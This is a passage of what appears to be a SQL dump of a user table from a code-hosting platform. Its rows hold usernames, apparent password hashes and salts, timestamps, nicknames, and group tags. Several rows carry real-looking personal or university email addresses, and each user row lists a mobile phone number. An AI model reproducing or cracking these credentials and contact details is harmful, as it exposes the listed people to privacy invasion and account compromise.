03:51:26','User',NULL,'','38fb7a8a5dbc305163462cee0371b40a',NULL,0,0,0,NULL,0,0,0,NULL,1,0,NULL,0,0,0,0,0,0,0,NULL,'military','b2bcc978f40ac6129fd6143f346c7f4040e215e3',111,0,1,0,0,0,0),(155,'p42689073','eb494bbe2d04ce9b65b3d3556f3265b3d1b221bd','','','p42689073@example.org',0,1,'2021-02-20 06:17:16','',NULL,'2021-01-22 15:35:25','2021-02-20 06:17:16','User',NULL,'','df471b49e51ccd6ce806ba57b646c57f',NULL,0,0,0,'18513853494',0,0,0,NULL,1,0,NULL,0,0,0,0,0,0,0,NULL,'military','44bbca12f23e485e15d93a2db9ad18b8b0f50a99',112,0,1,0,0,0,0),(156,'p68217053','a17dd7981f09be1e62f702c845a058519bcda2fa','','','phenglei@126.com',0,1,'2021-03-15 01:11:22','',NULL,'2021-01-26 09:20:06','2021-03-15 01:11:22','User',NULL,'only_my_events','b8f1e4f4d5c456a3f28f410726856827',NULL,0,0,0,'13696286255',0,0,0,'PHengLEI',1,0,NULL,0,0,0,0,0,0,0,NULL,'military','75d71ec760cbde9fa9eef8937f53b38630fa0a44',113,0,1,0,1,0,0),(157,'p24935176','84750f65e6982aa053514bb6affec94e5c66a6f9','','','p24935176@example.org',0,1,'2021-01-28 07:51:44','',NULL,'2021-01-26 18:21:59','2021-01-26 10:24:01','User',NULL,'only_my_events','568e6ded54188c206b7d289a0fb7ffcb',NULL,0,0,0,'19881671521',0,0,0,'梅穿酷儿',1,0,NULL,0,0,0,0,0,0,0,NULL,'military','dbb63c7b31a0d37e761ef83d4ca2ae31939399b1',114,0,1,0,0,0,0),(158,'p02563791','455c027ff780fd5124565cfbb6b9b4127c525e7e','','','p02563791@example.org',0,1,'2021-03-06 02:32:48','',NULL,'2021-01-28 15:58:34','2021-03-06 02:31:36','User',NULL,'','dbe9dc73e229f6bd63e3dfdc03b10186',NULL,0,0,0,'18990163422',0,0,0,'hechao',1,0,NULL,0,0,0,0,0,0,0,NULL,'military','e0a0ecd5fc53e16bf4eb74f96a0371ca523d0183',116,0,1,0,0,0,0),(159,'p45127936','f3c24117013e924bf5e007c0e1dd06da8117e019','','','p45127936@example.org',0,1,'2021-02-22 08:23:56','',NULL,'2021-01-28 18:25:26','2021-01-28 18:27:12','User',NULL,'','a0257a31eb16c41cc40d59df8e69c916',NULL,0,0,0,'13364061235',0,0,0,'带带大番薯',1,0,NULL,0,0,0,0,0,0,0,NULL,'military','2156af86698a6dfce6bf2d2688afdc4729c99af1',117,0,1,0,0,0,0),(160,'p74391568','f037dab8e546476dc276e95aa1568103937d1c8c','','','p74391568@example.org',0,1,'2021-03-10 08:54:41','',NULL,'2021-01-28 23:13:22','2021-03-10 08:54:41','User',NULL,'only_my_events','3a3898808922f26cca15f9ec69131fec',NULL,0,0,0,'15984411707',0,0,0,'mly',1,0,NULL,0,0,0,0,0,0,0,NULL,'military','31106bc02ddad5d890704f75d8508e0d020a0d22',118,0,1,0,0,0,0),(161,'p04953817','1f4a97ff377296024dbae6ff0d0861bc898b33c0','','','p04953817@example.org',0,1,'2021-02-20 09:56:38','',NULL,'2021-02-20 09:25:50','2021-02-20 09:27:07','User',NULL,'','b3f5153b3a69757e870a24c85d5815ee',NULL,0,0,0,'18374982164',0,0,0,'子非鱼',1,0,NULL,0,0,0,0,0,0,0,NULL,'military','b38adcae44db0b8af0a5d978b881b867bac9c864',119,0,1,0,1,0,0),(162,'p15823679','10fd13c93bcd01d8e17b81a577f3853ec617e2c7','','','p15823679@example.org',0,1,'2021-03-07 19:03:46','',NULL,'2021-02-20 09:26:02','2021-03-07 11:02:11','User',NULL,'only_my_events','d3aebd3d4cb2a288ed5aa59bbd9f0bd6',NULL,0,0,0,'15201175682',0,0,0,'xiaotsing',1,0,NULL,0,0,0,0,0,0,0,NULL,'military','5133ecf368d98e1ffe83f79fcac8f37c1fb2ba9c',120,0,1,0,0,0,0),(163,'p57103948','f6f8739c955cf2fc970b8e5bd6886782ea7f08d1','','','2274882591@qq.com',0,1,'2021-02-20 01:33:58','',NULL,'2021-02-20 09:32:11','2021-02-20 09:33:34','User',NULL,'only_my_events','b0fa010a604c6a8eeb41582015e0cd18',NULL,0,0,0,'13021100577',0,0,0,'LY',1,0,NULL,0,0,0,0,0,0,0,NULL,'military','6703745eb545f67e30a7d991e343c2cee7a87da0',121,0,1,0,0,0,0),(164,'p60728945','c99e0915e5224cac7ec2caec345b672ed7284a1c','','','yaoyang101@gmail.com',0,1,'2021-03-13 09:50:59','',NULL,'2021-02-20 09:37:17','2021-02-23 12:09:32','User',NULL,'only_my_events','33b6ac1e0f62a3254c0a44588d113948',NULL,0,0,0,'15217650365',0,0,0,'fatwolf',1,0,NULL,0,0,0,0,0,0,0,NULL,'military','9f520c4dbf1c814cd33a1217e7d39bc0f5d21d18',122,0,1,0,0,0,0),(165,'p28690714','f02299469a5b83deec0b181a4266f372cb7c9572','','','luqilin@hrbeu.edu.cn',0,1,'2021-03-09 16:23:15','',NULL,'2021-02-20 09:43:55','2021-03-09 08:23:14','User',NULL,'only_my_events','4484848dd76b4f73043cb75da3df3797',NULL,0,0,0,'13945101841',0,0,0,'剑惊风',1,0,NULL,0,0,0,0,0,0,0,NULL,'military','75181bb92c9e28d1923a738c84a8d910f65b4c02',123,0,1,0,1,0,0),(166,'p38029614','594ab9ea09309dfead1540f960cac52128a32d1b','','','p38029614@example.org',0,1,'2021-02-20 01:53:39','',NULL,'2021-02-20 09:44:37','2021-02-20 01:53:39','User',NULL,'only_my_events','215f9e73c5fdda14862830e011e8004a',NULL,0,0,0,'13268059518',0,0,0,'XI',1,0,NULL,0,0,0,0,0,0,0,NULL,'military','f60163accd3bc15207e458ab58416d0cad4eed00',124,0,1,0,0,0,0),(167,'p45712986','ce6e0ff589d4f6a32fa5a42bd61d78e84a49d0a4','','','p45712986@example.org',0,1,'2021-02-20 09:59:35','',NULL,'2021-02-20 09:48:10','2021-02-20 09:48:45','User',NULL,'only_my_events','da333f7d23650da6a6f0816139969012',NULL,0,0,0,'18281511058',0,0,0,'ZGYan',1,0,NULL,0,0,0,0,0,0,0,NULL,'military','cf6133916393f14d8f0bb874afa0da5df32fee2e',125,0,1,0,0,0,0),(168,'p74810659','5042ebce1c385740d20742eabb4defafa8335eeb','','','p74810659@example.org',0,1,'2021-02-20 10:00:48','',NULL,'2021-02-20 09:58:39','2021-02-20 02:00:45','User',NULL,'only_my_events','b02a4f790367d8d091a185d3305fbc5e',NULL,0,0,0,'15129061176',0,0,0,NULL,1,0,NULL,0,0,0,0,0,0,0,NULL,'military','a53bdc49882273b9e3e0e7b4835d233dae30206f',126,0,1,0,0,0,0),(169,'p48319207','c15883789c293f4bcb70cfe4994df5ab5a16bda1','','','p48319207@example.org',0,1,'2021-02-20 02:16:06','',NULL,'2021-02-20 10:13:41','2021-02-20 10:14:23','User',NULL,'only_my_events','4e9e0584db8e184cff6a9b8302dcfb32',NULL,0,0,0,'13551069527',0,0,0,'豆子',1,0,NULL,0,0,0,0,0,0,0,NULL,'military','d8118c80e8fdef3c3969e29f201a2fa6bba710f0',127,0,1,0,0,0,0),(170,'p75463810','8b3560e2ffbb10fdc140669d127b3d0fb0a3e3dc','','','p75463810@example.org',0,1,'2021-02-20 10:38:36','',NULL,'2021-02-20 10:34:58','2021-02-20 10:36:05','User',NULL,'only_my_events','f8d15da294725bf559604aed9ffe789d',NULL,0,0,0,'18101246757',0,0,0,'doumiaor',1,0,NULL,0,0,0,0,0,0,0,NULL,'military','118f3f10e72a1c8006f47102fe69ffc48c9b7d38',128,0,1,0,0,0,0),(171,'p12056437','5801d41b0841dcdc3346f721d49bbc288b73e507','','','zyjwind@163.com',0,1,'2021-03-08 08:15:47','',NULL,'2021-02-20 10:41:53','2021-03-08 08:15:47','User',NULL,'only_my_events','474f89cac7a99bd6ad17002a869b42cd',NULL,0,0,0,'18362883083',0,0,0,'AllanZHU',1,0,NULL,0,0,0,0,0,0,0,NULL,'military','0505610c0103c5ed2583f785db601a30cfb802b1',129,0,1,0,1,0,0),(172,'p19806473','1c850e13347c16a353b080009f54226822cec793','','','p19806473@example.org',0,1,'2021-02-20 16:56:37','',NULL,'2021-02-20 11:02:04','2021-02-20 11:07:23','User',NULL,'only_my_events','ffbda41292434e2c04dc2a09af23913b',NULL,0,0,0,'13770609278',0,0,0,'南京港图',1,0,NULL,0,0,0,0,0,0,0,NULL,'military','7f2cdf5c79307bbe791d6aa64f58d731585cd80b',130,0,1,0,1,0,0),(173,'p32491587','799df16ea8dd0a5e71b716d40b25926e9528798e','','','p32491587@example.org',0,1,'2021-03-06 09:08:57','',NULL,'2021-02-20 13:26:02','2021-03-06 09:08:57','User',NULL,'only_my_events','3ee4eebac3752864b1fc5e0012d71945',NULL,0,0,0,'15353665625',0,0,0,'agogo',1,0,NULL,0,0,0,0,0,0,0,NULL,'military','b72bf4977cfffd9070b89ac990270d3eab970c87',131,0,1,0,0,0,0),(174,'p83425619','39b3dcf4e902d355cd02c3cf6decdbde3484b240','','','p83425619@example.org',0,1,'2021-03-16 06:48:46','',NULL,'2021-02-20 14:13:02','2021-03-16 06:48:46','User',NULL,'only_my_events','87d7a9f7ff4e8ffec7662ee3cfd32099',NULL,0,0,0,'15957177409',0,0,0,'看不见我',1,0,NULL,0,0,0,0,0,0,0,NULL,'military','6de6910df83b43b97ce20216dcaadded6cb70991',132,0,1,0,1,0,0),(175,'p01573869','6613168962061edebc7c62c9143bb3fbc8be629f','','何志强','1245143188@qq.com',0,1,'2021-03-09 08:10:11','',NULL,'2021-02-20 14:22:15','2021-03-09 08:10:11','User',NULL,'only_my_events','2cee6c65dcc7df136b66029a8a47fe7a',NULL,0,0,0,'18143465227',0,0,0,'heray',0,0,NULL,0,0,0,0,0,0,0,NULL,'military','2eebda1de5561f1666d2291169105aff34f60d6d',133,0,1,0,1,0,0),(176,'p24170836','02d1ea5b690dcd36452fd72a543a5f2729499c43','','','p24170836@example.org',0,1,'2021-02-20 19:49:14','',NULL,'2021-02-20 19:46:55','2021-02-20 19:47:53','User',NULL,'only_my_events','f8c176e205edc7c19e2cc1c0c08b4153',NULL,0,0,0,'15835724733',0,0,0,'玻璃钢也是钢',1,0,NULL,0,0,0,0,0,0,0,NULL,'military','638b77add2c722681eb2af0bc1f86f0f4f28ae41',134,0,1,0,0,0,0),(177,'p63825170','431aaffee0422dbc7ec4b340394022b746772730','','','dingxu@mail.xjtu.edu.cn',0,1,'2021-03-05 06:30:30','',NULL,'2021-02-21 14:02:22','2021-03-04 13:42:51','User',NULL,'only_my_events','688a4a1c80dd69461017f17f85546ab1',NULL,0,0,0,'13379243667',0,0,0,'雨打芭蕉',1,0,NULL,0,0,0,0,0,0,0,NULL,'military','0674561f5d4995ca7b0604d376288f33253cb780',135,0,1,0,1,0,0),(178,'p73014295','533a723706c38272a3171a46953d8d9e5a5591d2','','','p73014295@example.org',0,1,'2021-02-24 16:34:15','',NULL,'2021-02-22 22:36:59','2021-02-24 08:33:41','User',NULL,'only_my_events','24164f59f41a3242bfff33d7005351aa',NULL,0,0,0,'15840501160',0,0,0,NULL,1,0,NULL,0,0,0,0,0,0,0,NULL,'military','cac5aacb904cb90cca3ff304c0292f33d909e0bf',136,0,1,0,0,0,0),(179,'p76243581','b4c1a87ed7d5961958ef813c54a0f7eed1257509','','','p76243581@example.org',0,1,'2021-03-09 20:55:13','',NULL,'2021-02-24 14:52:38','2021-03-07 06:45:58','User',NULL,'only_my_events','30ab81a682d2524094c573ee74cbe8e6',NULL,0,0,0,'15109287698',0,0,0,'匿辰',1,0,NULL,0,0,0,0,0,0,0,NULL,'military','acffa20f306f8d6e75377dbd986b3aef0fb27fad',137,0,1,0,1,0,0),(180,'p49506187','d7595743f5b658ad26e99f06b610e17ce2b086af','','','p49506187@example.org',0,1,'2021-03-14 12:41:11','',NULL,'2021-02-24 17:51:45','2021-03-14 12:41:11','User',NULL,'only_my_events','0bc9d70daf6241a1a48bcd00083fbf5d',NULL,0,0,0,'13298789737',0,0,0,'tunnel2ord',1,0,NULL,0,0,0,0,0,0,0,NULL,'military','10af3bb3bed312a93050a26728155a2d6787f977',138,0,1,0,0,0,0),(181,'p85947160','4d7460b03cfdc2e0c51e735b7410dc503fadb3b5','','','p85947160@example.org',0,1,'2021-03-16 14:57:48','',NULL,'2021-02-25 08:42:04','2021-03-16 00:21:51','User',NULL,'only_my_events','6268724294af6315c8ded78df12b72d6',NULL,0,0,0,'18716470818',0,0,0,'杨颖滢',1,0,NULL,0,0,0,0,0,0,0,NULL,'military','2e9f8de8fdf60c3c7a8b0dd584f108a4a0f400a9',139,0,1,0,0,0,0),(182,'p85749103','4a8983465218706be35c31e28ea53d758ec1b248','','','1234@qq.com',0,1,'2021-03-04 03:25:56','',NULL,'2021-02-25 08:49:06','2021-03-04 03:25:56','User',NULL,'only_my_events','329093177b3eae1c385a12639ffa4d90',NULL,0,0,0,'13121886117',0,0,0,'qwer',1,0,NULL,0,0,0,0,0,0,0,NULL,'military','89efee0f55ce49635ca735815098218b65949066',140,0,1,0,1,0,0),(183,'p84675293','992e79a294ecdc989b447797bd65ce85595b5850','','','p84675293@example.org',0,1,'2021-03-02 05:58:45','',NULL,'2021-02-25 14:01:00','2021-03-02 05:58:45','User',NULL,'only_my_events','f5c11a060cf2e776c83b58efe26b9a3c',NULL,0,0,0,'13141477642',0,0,0,'Blacksong',1,0,NULL,0,0,0,0,0,0,0,NULL,'military','1186dd4f095bfef16d445f052a03d3c04d4f12e2',141,0,1,0,0,0,0),(184,'p12945678','1650bb954be870d84d64da74b4ef561e581ad7f3','','','p12945678@example.org',0,1,'2021-02-26 02:34:31','',NULL,'2021-02-26 10:24:39','2021-02-26 02:34:31','User',NULL,'only_my_events','f8a37a84f93d2c7334e5c005d316a97e',NULL,0,0,0,'15123102653',0,0,0,'YangYY',1,0,NULL,0,0,0,0,0,0,0,NULL,'military','ac4e98dfca35c2cc14a28d70b303fc083d05a3a2',142,0,1,0,0,0,0),(185,'p23947065','922fb5f69addcdbe2b25a9fef36616121eadc525','','','p23947065@example.org',0,1,'2021-02-26 12:18:20','',NULL,'2021-02-26 20:15:44','2021-03-05 06:59:27','User',NULL,'','05830b3e90edb757e822dc0ef595d44b',NULL,0,0,0,'18390891589',0,0,0,'使命召唤',1,0,NULL,0,0,0,0,0,0,0,NULL,'forge','4b0cf37b2e1434af0be6447c1740d9501c7bd19d',186,0,1,0,0,0,0),(186,'p75068923','01a866b453508514333fd15f776578b6aecc1eb1','','','p75068923@example.org',0,1,'2021-03-16 07:44:55','',NULL,'2021-03-01 19:03:55','2021-03-05 06:59:27','User',NULL,'','787edbec25ce2ea9f20405011443ad73',NULL,0,0,0,'15721957337',0,0,0,'wangling',1,0,NULL,0,0,0,0,0,0,0,NULL,'forge','e2673b9f7d07631c6495c6f8adb49300bf46efc0',187,0,1,0,0,0,0),(187,'p75426908','3bd3d4bc00e1bba3dc7a48b363674b8785ac8eb8','','','mxy6@mail.ustc.edu.cn',0,1,'2021-03-05 02:50:10','',NULL,'2021-03-01 22:07:13','2021-03-05 06:59:28','User',NULL,'','3f00f74e6dea43b24050627c413d7e70',NULL,0,0,0,'17354110096',0,0,0,NULL,1,0,NULL,0,0,0,0,0,0,0,NULL,'forge','e16bb60e33718849e5f07471d5e3f4a3a2e10bf4',188,0,1,0,0,0,0),(188,'ceshi_org_1','','','',NULL,0,1,NULL,'',NULL,'2021-03-02 03:43:11','2021-03-02 03:43:11','Organization',NULL,'',NULL,NULL,0,0,0,NULL,0,0,0,NULL,1,0,NULL,0,0,0,0,0,0,0,NULL,'0','d1a8cfe9c1135518024b84ec0faafd19d45d85a6',143,0,1,0,0,0,0),(189,'p97826145','29d992d76fc41dfc1cf7dd832a6f97049a74e76b','','','p97826145@example.org',0,1,'2021-03-09 11:58:22','',NULL,'2021-03-03 07:35:42','2021-03-09 11:58:05','User',NULL,'only_my_events','eb66d378ad412bab41cfce91a1e6e56b',NULL,0,0,0,'15950585303',0,0,0,'gg',1,0,NULL,0,0,0,0,0,0,0,NULL,'forge','701eef82571a8b81b0eb4fd6d6df5c725248b1b6',189,0,1,0,1,0,0),(190,'p14639075','62976d4170591f27f1b33af5ded62745eca97b94','','','mecan.l@foxmail.com',0,1,'2021-03-16 06:42:52','',NULL,'2021-03-04 10:12:27','2021-03-16 06:42:52','User',NULL,'only_my_events','fe81d089dd7ac86ecf3184fb2131c20d',NULL,0,0,0,'18530799619',0,0,0,'一条大河波浪~',1,0,NULL,0,0,0,0,0,0,0,NULL,'forge','ffd46a47b72683585bc0b3301ccb649a6f3cd945',190,0,1,0,1,0,0),(191,'p30846295','c4dc9d60f528dd264148f6e1b87a13e393d7b65c','','','p30846295@example.org',0,1,'2021-03-05 05:08:26','',NULL,'2021-03-04 10:16:31','2021-03-05 05:08:26','User',NULL,'only_my_events','5d8666eefd183b69c98b9da9b87f4627',NULL,0,0,0,'18768134456',0,0,0,'大老和山',1,0,NULL,0,0,0,0,0,0,0,NULL,'forge','56b0f40954fb5b574c4902f57bca7e84a0df9ee0',144,0,1,0,0,0,0),(192,'p47612539','1dcbf8b6208853ec7f0be3e7cbbf5ef9981a312f','','','p47612539@example.org',0,1,'2021-03-15 02:24:04','',NULL,'2021-03-04 10:17:21','2021-03-05 02:30:38','User',NULL,'only_my_events','1884d7afbbf2590aa505367ea86a0ca4',NULL,0,0,0,'13335515203',0,0,0,'liqi',1,0,NULL,0,0,0,0,0,0,0,NULL,'forge','b02025800b8f8ba2080539f3247235694647b845',145,0,1,0,0,0,0),(193,'p83954127','7455f00983b5f8fdc45bd1b9da8f6e8a2cbfa7dc','','','gzt200361@163.com',0,1,'2021-03-13 09:40:51','',NULL,'2021-03-04 10:19:53','2021-03-05 06:59:28','User',NULL,'only_my_events','b24147dd0ac16e461c7e36116d8c37d5',NULL,0,0,0,'15850566518',0,0,0,'钢铁侠',1,0,NULL,0,0,0,0,0,0,0,NULL,'forge','7f999dd53a55dd18cb9f14d83af1fb6e835ccca9',191,0,1,0,1,0,0),(194,'p45906281','c950417022537e3e11ade15a9b7dbef1813d07c8','','','p45906281@example.org',0,1,'2021-03-16 01:49:23','',NULL,'2021-03-04 10:19:59','2021-03-16 01:49:23','User',NULL,'only_my_events','2526918ecbe0115e8f4118b23f315926',NULL,0,0,0,'18222965919',0,0,0,'g0126',1,0,NULL,0,0,0,0,0,0,0,NULL,'forge','d07905c24f8a083ad830b82e8c0993693c019516',192,0,1,0,1,0,0),(195,'p26041895','c6d17e27435f085cb3ed301304e0885f5a438952','','','p26041895@example.org',0,1,'2021-03-04 15:17:43','',NULL,'2021-03-04 10:20:06','2021-03-05 06:59:28','User',NULL,'only_my_events','70a2dcc7b62cb01263cc53874a127e95',NULL,0,0,0,'18368090601',0,0,0,'nescirem',1,0,NULL,0,0,0,0,0,0,0,NULL,'forge','c1d9c9ce1fe02534a352df7847c8e7f61eacaaa8',193,0,1,0,1,0,0),(196,'p98237604','7a1cd690c425fc748d68449d5a6af89b2a48ee63','','','p98237604@example.org',0,1,'2021-03-04 10:27:32','',NULL,'2021-03-04 10:27:32','2021-03-05 06:59:28','User',NULL,'only_my_events','f68a2b74e22a2fe7056a2094ffb21ba5',NULL,0,0,0,'15850570076',0,0,0,'xiaoxin',1,0,NULL,0,0,0,0,0,0,0,NULL,'forge','8281b5a2e02b6dfc678614675970aa7c20b92ea7',194,0,1,0,0,0,0),(197,'p65907128','e94f42c9e8848aafc8155cfb9781c555cda63daa','','','lkq2783380@163.com',0,1,'2021-03-04 10:40:43','',NULL,'2021-03-04 10:28:07','2021-03-05 06:59:29','User',NULL,'only_my_events','9708057a5212c0dea4a3d9ab1f5a3e22',NULL,0,0,0,'13652081916',0,0,0,'华电-娄刻强',1,0,NULL,0,0,0,0,0,0,0,NULL,'forge','f1e543e109d2afd3aaeb493757277a5101a2bfdd',195,0,1,0,1,0,0),(198,'p84697513','26b4f58b3a80910ef9ba10497e7273fc0e6a7a92','','','p84697513@example.org',0,1,'2021-03-04 10:29:41','',NULL,'2021-03-04 10:29:41','2021-03-05 06:59:29','User',NULL,'only_my_events','7ff0ee944b2766b7903c914da8d3048e',NULL,0,0,0,'13126538485',0,0,0,'Destiny',1,0,NULL,0,0,0,0,0,0,0,NULL,'forge','ee06a1382ef6ea848f5752c03cd3ccff279be6d2',196,0,1,0,0,0,0),(199,'p76943120','7d63fc5ef3d74b52f75d23a5a7ee969b6ed5009c','','','p76943120@example.org',0,1,'2021-03-04 02:46:33','',NULL,'2021-03-04 10:42:07','2021-03-05 06:59:29','User',NULL,'only_my_events','0e5a7ee594aa4ff155577775e640259b',NULL,0,0,0,'13572150485',0,0,0,'laoqq',1,0,NULL,0,0,0,0,0,0,0,NULL,'forge','24c916862f977095b95efe6046cc89472218c9eb',197,0,1,0,0,0,0),(200,'p67342801','d5a0abc3ed2779fe0872c08882b0290c9c73817f','','','p67342801@example.org',0,1,'2021-03-04 03:11:43','',NULL,'2021-03-04 11:10:46','2021-03-05 06:59:29','User',NULL,'only_my_events','eb965e1e526269442bc2a5a2d5498f02',NULL,0,0,0,'18829238314',0,0,0,'aeroblue',1,0,NULL,0,0,0,0,0,0,0,NULL,'forge','051eaa18b07820c70546d76c519ecbf0a27a3bad',198,0,1,0,0,0,0),(201,'p67523089','f933d326c3a290e58ff9b3ef5895a9ce5510883d','','','p67523089@example.org',0,1,'2021-03-05 10:32:57','',NULL,'2021-03-05 10:32:57','2021-03-05 02:41:56','User',NULL,'','a2731b62fc9fc8756c1eeae5feac1e9f',NULL,0,0,0,'15386415131',0,0,0,NULL,1,0,NULL,0,0,0,0,0,0,0,NULL,'military','0f943e693433cdf55d161b86c159aaffc99590c5',146,0,1,0,0,0,0),(202,'p41826307','8edb8cd4641f8cae8b3d04a5c8619f3a191a4e3f','','','p41826307@example.org',0,1,'2021-03-05 11:23:45','',NULL,'2021-03-05 11:23:45','2021-03-05 06:59:29','User',NULL,'only_my_events','bbcde95e704202850d8d562b0b7e6156',NULL,0,0,0,'15386415132',0,0,0,NULL,1,0,NULL,0,0,0,0,0,0,0,NULL,'forge','43340686ebc49e9b45d3405626a204c4b8e12283',199,0,1,0,0,0,0),(203,'p94518037','1d2e96a695b5ef273fdb0c4d5478aadbe73a314d','','','p94518037@example.org',0,1,'2021-03-12 15:49:56','',NULL,'2021-03-05 13:12:22','2021-03-12 07:49:54','User',NULL,'only_my_events','0972ce4b816c99e7dc1ba178559bc25e',NULL,0,0,0,'18946190778',0,0,0,'FastCAE',1,0,NULL,0,0,0,0,0,0,0,NULL,'forge','f894935fc8ab6030b6bd44938cb485f0bef19e7a',200,0,1,0,1,0,0),(204,'p10934725','8a261c18b25430a14e6ee5caf492f7867baf129d','','','p10934725@example.org',0,1,'2021-03-05 06:47:02','',NULL,'2021-03-05 14:19:55','2021-03-05 06:59:29','User',NULL,'only_my_events','8a87fb4226d24a4d964b6fdc4f0e4979',NULL,0,0,0,'15386415133',0,0,0,NULL,1,0,NULL,0,0,0,0,0,0,0,NULL,'forge','c2fc4816c1100a7ee03c94ae1cc646068c17b309',201,0,1,0,0,0,0),(205,'p81450397','763610ed164932ce31d8347cae40c29808e48039','','','p81450397@example.org',0,1,'2021-03-05 06:46:12','',NULL,'2021-03-05 14:37:57','2021-03-05 06:37:57','User',NULL,'','3cca54ad9016129eb8a2eac610411538',NULL,0,0,0,'15386415134',0,0,0,NULL,1,0,NULL,0,0,0,0,0,0,0,NULL,'military','e01ca9729877d965c694a0429f344f833fdee3b5',147,0,1,0,0,0,0),(206,'p50379126','a0cd8f3ed0a603cc9faf25b7f7ad3e569360889e','','','p50379126@example.org',0,1,'2021-03-05 14:05:15','',NULL,'2021-03-05 22:04:34','2021-03-05 22:05:02','User',NULL,'','22e5502f70d800e4f4132739f86299d6',NULL,0,0,0,'15850687079',0,0,0,'CFD',1,0,NULL,0,0,0,0,0,0,0,NULL,'military','abf7e12ea984e7aa50e879b2f5116545f289ba01',202,0,1,0,0,0,0),(207,'p43720591','563a7ccd70bb30459c87f95a3b91b13252d06b80','','','p43720591@example.org',0,1,'2021-03-06 12:45:26','',NULL,'2021-03-06 17:19:19','2021-03-06 12:45:26','User',NULL,'only_my_events','d87a3260d435cb2edca497880c328bef',NULL,0,0,0,'18813111529',0,0,0,'XYC',1,0,NULL,0,0,0,0,0,0,0,NULL,'military','b056761ac572d0b3c8b57f1ff37ff39b11c3a25a',203,0,1,0,0,0,0),(208,'p30728194','643190b5e5eb5b69080c2a10a3cc76d674160224','','','p30728194@example.org',0,1,'2021-03-10 03:52:48','',NULL,'2021-03-06 17:26:16','2021-03-10 03:52:48','User',NULL,'only_my_events','12199c674bf1884d1ad22edf14141273',NULL,0,0,0,'18851655399',0,0,0,'Rivac',1,0,NULL,0,0,0,0,0,0,0,NULL,'military','4c6014a40c1d618e2c2b5214407166a0045ad766',204,0,1,0,0,0,0),(209,'p10954382','e8e66bc66364ab2f4869f8e09bdfe5dc68af874d','','','p10954382@example.org',0,1,'2021-03-08 16:56:21','',NULL,'2021-03-06 18:04:36','2021-03-06 10:10:22','User',NULL,'only_my_events','2b94c7dbab95885bfa0df9adfc2b0e38',NULL,0,0,0,'15852088802',0,0,0,'刘剑明',1,0,NULL,0,0,0,0,0,0,0,NULL,'military','a699bf61c1919a569d3c60f24ee3301c0f7d3423',205,0,1,0,0,0,0),(210,'p91278563','28c85d9aead9b3d0902ba791a012bd36d692ee74','','','p91278563@example.org',0,1,'2021-03-11 01:31:08','',NULL,'2021-03-06 19:56:38','2021-03-11 01:31:08','User',NULL,'only_my_events','52fc0ac8aa391bde9032ceab1bc175b3',NULL,0,0,0,'13817567047',0,0,0,'7088',1,0,NULL,0,0,0,0,0,0,0,NULL,'military','5440c0e83e0c40359b07a0cc115771da9bf9f5c9',206,0,1,0,0,0,0),(211,'p37401695','c2a44468b4a3bd7c26ab23dcc4cc5c918a632e0b','','','p37401695@example.org',0,1,'2021-03-09 07:58:30','',NULL,'2021-03-07 23:20:59','2021-03-09 07:58:30','User',NULL,'only_my_events','2d50b80ed631ed4b14762932b9628d7d',NULL,0,0,0,'15821253655',0,0,0,'dnee',1,0,NULL,0,0,0,0,0,0,0,NULL,'military','1238e2b4fa72c04ab057e0f627fce10e61c6ab18',207,0,1,0,0,0,0),(212,'p54713986','fafd4f1ff999bd0d245519cbfc8431cc0b094758','','','zhen.lu@pku.edu.cn',0,1,'2021-03-15 16:36:22','',NULL,'2021-03-09 16:01:16','2021-03-15 08:36:11','User',NULL,'','1cb93a3a7dace776f45e5d5532d21441',NULL,0,0,0,'15652776324',0,0,0,'LuzyPer',1,0,NULL,0,0,0,0,0,0,0,NULL,'military','37dcfd46369279d7761047604b6842c0a5d1c4f0',208,0,1,0,0,0,0),(213,'p30251869','8cc17059444b449237b426bc534b7e4e0daa5229','','','p30251869@example.org',0,1,'2021-03-09 16:27:36','',NULL,'2021-03-09 16:20:16','2021-03-09 08:27:26','User',NULL,'','51e31ff069dfa992d9edfa9af624844f',NULL,0,0,0,'18284572692',0,0,0,'璃璃',1,0,NULL,0,0,0,0,0,0,0,NULL,'military','ac1844adb242538db3c250a8b7fb753c07278a0a',209,0,1,0,0,0,0),(214,'p19562378','2caacddfc78242bec356f89eb2ce3ea0f8b772e0','','','nudtxiewei@163.com',0,1,'2021-03-09 13:59:29','',NULL,'2021-03-09 16:43:12','2021-03-09 13:59:29','User',NULL,'only_my_events','3fb1c955b220d6a924180b4e85baef28',NULL,0,0,0,'18373137353',0,0,0,'MDT',1,0,NULL,0,0,0,0,0,0,0,NULL,'military','51f3b0e20256277b4dcfc9cd85318ac9d2685f34',210,0,1,0,1,0,0),(215,'p19523807','490a35e493fd0c169fb4af14ba66f786addc5950','','','756011465@qq.com',0,1,'2021-03-10 13:19:14','',NULL,'2021-03-09 21:49:19','2021-03-10 13:19:14','User',NULL,'only_my_events','28ebdf0eee72810e5cb8b01081dbcd83',NULL,0,0,0,'15810173698',0,0,0,'qinhan89',1,0,NULL,0,0,0,0,0,0,0,NULL,'military','d7ced7c3e906438a6bfd0961c0af095e1009748a',211,0,1,0,1,0,0),(216,'p60978425','2b78db5eb5712ffd9dc23523f5c99e10981241da','','','p60978425@example.org',0,1,'2021-03-12 11:34:38','',NULL,'2021-03-10 18:03:19','2021-03-12 02:55:55','User',NULL,'only_my_events','bc98d09e64382898d9d16193e1d75d9a',NULL,0,0,0,'13716758829',0,0,0,'LF',1,0,NULL,0,0,0,0,0,0,0,NULL,'military','436856919cd74cf71c37dbd899105e6d64d76be4',212,0,1,0,0,0,0),(217,'p29638517','666542598f1d9e3a6aab231b9686c8c8676da44c','','','p29638517@example.org',0,1,'2021-03-12 22:13:24','',NULL,'2021-03-11 07:02:07','2021-03-12 22:13:24','User',NULL,'only_my_events','f244f473d672352a9b8a74380e983db8',NULL,0,0,0,'15876292980',0,0,0,NULL,1,0,NULL,0,0,0,0,0,0,0,NULL,'military','5cdbfcf0265b3cb2c172611f0e78b7b85c17fc0d',213,0,1,0,0,0,0),(218,'p82167049','4c9adb7e60e64b30a73de825e0e8a5ac6fa4832f','','','p82167049@example.org',0,1,'2021-03-11 07:18:15','',NULL,'2021-03-11 15:05:29','2021-03-11 07:18:15','User',NULL,'','ff439e416043e02b4bedd559d58420c8',NULL,0,0,0,'15652926529',0,0,0,'maddaddy',1,0,NULL,0,0,0,0,0,0,0,NULL,'military','f33ef9efe4be90e62381a00e1ab8d32535f0b45e',214,0,1,0,0,0,0),(219,'p40167285','00bd86c7a5ced33d9da7b69578e5496bfad3bfd1','','','zcxy@nuaa.edu.cn',0,1,'2021-03-14 05:32:24','',NULL,'2021-03-12 20:36:44','2021-03-14 